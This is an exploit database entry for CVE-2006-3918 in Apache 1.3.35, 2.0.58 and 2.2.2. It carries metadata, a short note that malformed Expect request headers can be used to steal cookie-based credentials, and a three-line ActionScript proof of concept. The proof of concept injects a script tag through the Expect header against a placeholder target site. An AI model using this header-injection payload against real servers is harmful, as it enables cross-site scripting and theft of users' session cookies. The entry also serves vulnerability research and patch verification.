Apache 1.3.35/2.0.58/2.2.2 - Arbitrary HTTP Request Headers Security

Author: Thiago Zaninotti
type: remote
platform: linux
port: 
date_added: 2006-08-24 
date_updated: 2013-09-21 
verified: 1 
codes: CVE-2006-3918;OSVDB-27488 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/19661/info

Apache HTTP server is prone to a security weakness related to HTTP request headers.

An attacker may exploit this issue to steal cookie-based authentication credentials and launch other attacks.

var req:LoadVars=new LoadVars();
req.addRequestHeader("Expect",
"<script>alert('gotcha!')</script>");
req.send("http://www.target.site/","_blank","GET");